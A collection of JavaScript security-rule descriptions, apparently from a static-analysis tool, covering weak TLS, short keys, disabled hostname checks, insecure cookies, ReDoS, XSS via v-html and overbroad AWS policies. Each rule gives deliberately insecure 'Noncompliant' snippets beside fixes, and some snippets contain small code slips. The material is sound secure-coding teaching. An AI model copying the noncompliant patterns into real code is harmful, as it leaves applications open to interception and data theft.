Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

Noncompliant code example

NodeJs offers multiple ways to set weak TLS protocols. For https and tls, these options are used and are used in other third-party libraries as well.

The first is secureProtocol:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
 secureProtocol: 'TLSv1_method' // Noncompliant
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

The second is the combination of minVersion and maxVerison. Note that they cannot be specified along with the secureProtocol option:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.1',  // Noncompliant
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

And secureOptions, which in this example instructs the OpenSSL protocol to turn off some algorithms altogether. In general, this option might trigger side effects and should be used carefully, if used at all.

const https     = require('node:https');
const tls       = require('node:tls');
const constants = require('node:crypto'):

let options = {
  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
}; // Noncompliant

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Compliant solution

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });
const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.2',
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Here, the goal is to turn on only TLSv1.2 and higher, by turning off all lower versions:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
    | constants.SSL_OP_NO_TLSv1_1
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

javascript:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the Math.random() function relies on a weak pseudorandom number generator, this function should not be used for security-critical applications or for protecting sensitive data. In such context, a cryptographically strong pseudorandom number generator (CSPRNG) should be used instead.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a cryptographically strong pseudorandom number generator (CSPRNG) like crypto.getRandomValues().
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

const val = Math.random(); // Sensitive
// Check if val is used in a security context.

Compliant Solution

// === Client side ===
const crypto = window.crypto || window.msCrypto;
var array = new Uint32Array(1);
crypto.getRandomValues(array); // Compliant for security-sensitive use cases

// === Server side ===
const crypto = require('crypto');
const buf = crypto.randomBytes(1); // Compliant for security-sensitive use cases

See

javascript:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPair('ec', {
    namedCurve: 'secp112r2', // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Compliant solution

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPair('ec', {
    namedCurve: 'secp224k1',
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

javascript:S5757

Log management is an important topic, especially for the security of a web application, to ensure user activity, including potential attackers, is recorded and available for an analyst to understand what’s happened on the web application in case of malicious activities.

Retention of specific logs for a defined period of time is often necessary to comply with regulations such as GDPR, PCI DSS and others. However, to protect user’s privacy, certain informations are forbidden or strongly discouraged from being logged, such as user passwords or credit card numbers, which obviously should not be stored or at least not in clear text.

Ask Yourself Whether

In a production environment:

  • The web application uses confidential information and logs a significant amount of data.
  • Logs are externalized to SIEM or Big Data repositories.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Loggers should be configured with a list of confidential, personal information that will be hidden/masked or removed from logs.

Sensitive Code Example

With Signale log management framework the code is sensitive when an empty list of secrets is defined:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like ["1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance

const options = {
  secrets: []         // empty list of secrets
};

const logger = new Signale(options); // Sensitive

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});

Compliant Solution

With Signale log management framework it is possible to define a list of secrets that will be hidden in logs:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like ["1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance

const options = {
  secrets: ["([0-9]{4}-?)+"]
};

const logger = new Signale(options); // Compliant

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});

See

javascript:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offer an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

cookie-session module:

let session = cookieSession({
  httpOnly: false,// Sensitive
});  // Sensitive

express-session module:

const express = require('express'),
const session = require('express-session'),

let app = express()
app.use(session({
  cookie:
  {
    httpOnly: false // Sensitive
  }
})),

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: false }}); // Sensitive

Compliant Solution

cookie-session module:

let session = cookieSession({
  httpOnly: true,// Compliant
});  // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    httpOnly: true // Compliant
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: true }}); // Compliant

See

javascript:S4784

This rule is deprecated; use S5852 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine performance decrease with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the one engine you’re are using.

Use if possible a library which is not vulnerable to Redos Attacks such as Google Re2.

Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.

Sensitive Code Example

const regex = /(a+)+b/; // Sensitive
const regex2 = new RegExp("(a+)+b"); // Sensitive

str.search("(a+)+b"); // Sensitive
str.match("(a+)+b"); // Sensitive
str.split("(a+)+b"); // Sensitive

Note: String.matchAll does not raise any issue as it is not supported by NodeJS.

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both side of a "|".

See

javascript:S5759

Users often connect to web servers through HTTP proxies.

Proxy can be configured to forward the client IP address via the X-Forwarded-For or Forwarded HTTP headers.

IP address is a personal information which can identify a single user and thus impact his privacy.

Ask Yourself Whether

  • The web application uses reverse proxies or similar but doesn’t need to know the IP address of the user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

User IP address should not be forwarded unless the application needs it, as part of an authentication, authorization scheme or log management for examples.

Sensitive Code Example

node-http-proxy

var httpProxy = require('http-proxy');

httpProxy.createProxyServer({target:'http://localhost:9000', xfwd:true}) // Noncompliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true, xfwd: true })); // Noncompliant
app.listen(3000);

Compliant Solution

node-http-proxy

var httpProxy = require('http-proxy');

// By default xfwd option is false
httpProxy.createProxyServer({target:'http://localhost:9000'}) // Compliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

// By default xfwd option is false
app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true})); // Compliant
app.listen(3000);

See

javascript:S6281

By default S3 buckets are private, it means that only the bucket owner can access it.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies or ACLs to be set on a S3 bucket the following booleans settings can be enabled:

  • blockPublicAcls: to block or not public ACLs to be set to the S3 bucket.
  • ignorePublicAcls: to consider or not existing public ACLs set to the S3 bucket.
  • blockPublicPolicy: to block or not public policies to be set to the S3 bucket.
  • restrictPublicBuckets: to restrict or not the access to the S3 endpoints of public policies to the principals within the bucket owner account.

The other attribute BlockPublicAccess.BLOCK_ACLS only turns on blockPublicAcls and ignorePublicAcls. The public policies can still affect the S3 bucket.

However, all of those options can be enabled by setting the blockPublicAccess property of the S3 bucket to BlockPublicAccess.BLOCK_ALL.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • blockPublicAcls to True to block new attempts to set public ACLs.
  • ignorePublicAcls to True to block existing public ACLs.
  • blockPublicPolicy to True to block new attempts to set public policies.
  • restrictPublicBuckets to True to restrict existing public policies.

Sensitive Code Example

By default, when not set, the blockPublicAccess is fully deactivated (nothing is blocked):

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket'
}); // Sensitive

This block_public_access allows public ACL to be set:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : false, // Sensitive
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

The attribute BLOCK_ACLS only blocks and ignores public ACLs:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ACLS // Sensitive
});

Compliant Solution

This blockPublicAccess blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL
});

A similar configuration to the one above can be obtained by setting all parameters of the blockPublicAccess

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : true,
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

See

javascript:S2255

This rule is deprecated, and will eventually be removed.

Using cookies is security-sensitive. It has led in the past to the following vulnerabilities:

Attackers can use widely-available tools to read cookies. Any sensitive information they may contain will be exposed.

This rule flags code that writes cookies.

Ask Yourself Whether

  • sensitive information is stored inside the cookie.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Cookies should only be used to manage the user session. The best practice is to keep all user-related information server-side and link them to the user session, never sending them to the client. In a very few corner cases, cookies can be used for non-sensitive information that need to live longer than the user session.

Do not try to encode sensitive information in a non human-readable format before writing them in a cookie. The encoding can be reverted and the original information will be exposed.

Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.

As a side note, every information read from a cookie should be Sanitized.

Sensitive Code Example

// === Built-in NodeJS modules ===
const http = require('http');
const https = require('https');

http.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
https.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
// === ExpressJS ===
const express = require('express');
const app = express();
app.use(function(req, res, next) {
  res.cookie('name', 'John'); // Sensitive
});
// === In browser ===
// Set cookie
document.cookie = "name=John"; // Sensitive

See

javascript:S2817

This rule is deprecated, and will eventually be removed.

Why is this an issue?

The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some browsers. (It is not supported in Firefox or IE.)

Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.

Noncompliant code example

var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);  // Noncompliant

Resources

javascript:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Node.js

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by overriding checkServerIdentity with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Standards

javascript:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

const crypto = require("crypto");

const hash = crypto.createHash('sha1'); // Sensitive

Compliant Solution

const crypto = require("crypto");

const hash = crypto.createHash('sha512'); // Compliant

See

javascript:S6299

Vue.js framework prevents XSS vulnerabilities by automatically escaping HTML contents with the use of native API browsers like innerText instead of innerHtml.

It’s still possible to explicity use innerHtml and similar APIs to render HTML. Accidentally rendering malicious HTML data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive information or impersonating other users.

Ask Yourself Whether

The application needs to render HTML content which:

  • could be user-controlled and not previously sanitized.
  • is difficult to understand how it was constructed.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid injecting HTML content with v-html directive unless the content can be considered 100% safe, instead try to rely as much as possible on built-in auto-escaping Vue.js features.
  • Take care when using the v-bind:href directive to set URLs which can contain malicious Javascript (javascript:onClick(...)).
  • Event directives like :onmouseover are also prone to Javascript injection and should not be used with unsafe values.

Sensitive Code Example

When using Vue.js templates, the v-html directive enables HTML rendering without any sanitization:

<div v-html="htmlContent"></div> <!-- Noncompliant -->

When using a rendering function, the innerHTML attribute enables HTML rendering without any sanitization:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerHTML: this.htmlContent, // Noncompliant
        }
      }
    );
  },
});

When using JSX, the domPropsInnerHTML attribute enables HTML rendering without any sanitization:

<div domPropsInnerHTML={this.htmlContent}></div> <!-- Noncompliant -->

Compliant Solution

When using Vue.js templates, putting the content as a child node of the element is safe:

<div>{{ htmlContent }}</div>

When using a rendering function, using the innerText attribute or putting the content as a child node of the element is safe:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerText: this.htmlContent,
        }
      },
      this.htmlContent // Child node
    );
  },
});

When using JSX, putting the content as a child node of the element is safe:

<div>{this.htmlContent}</div>

See

javascript:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access and disclosure of sensitive information will occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., by only granting access to necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of data they store or process. Therefore, managing a secure access control is less prone to errors.

Sensitive Code Example

The wildcard "*" is specified as the resource for this PolicyStatement. This grants the update permission for all policies of the account:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["*"] // Sensitive
        })
    ]
})

Compliant Solution

Restrict the update permission to the appropriate subset of policies:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["arn:aws:iam:::policy/team1/*"]
        })
    ]
})

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

javascript:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

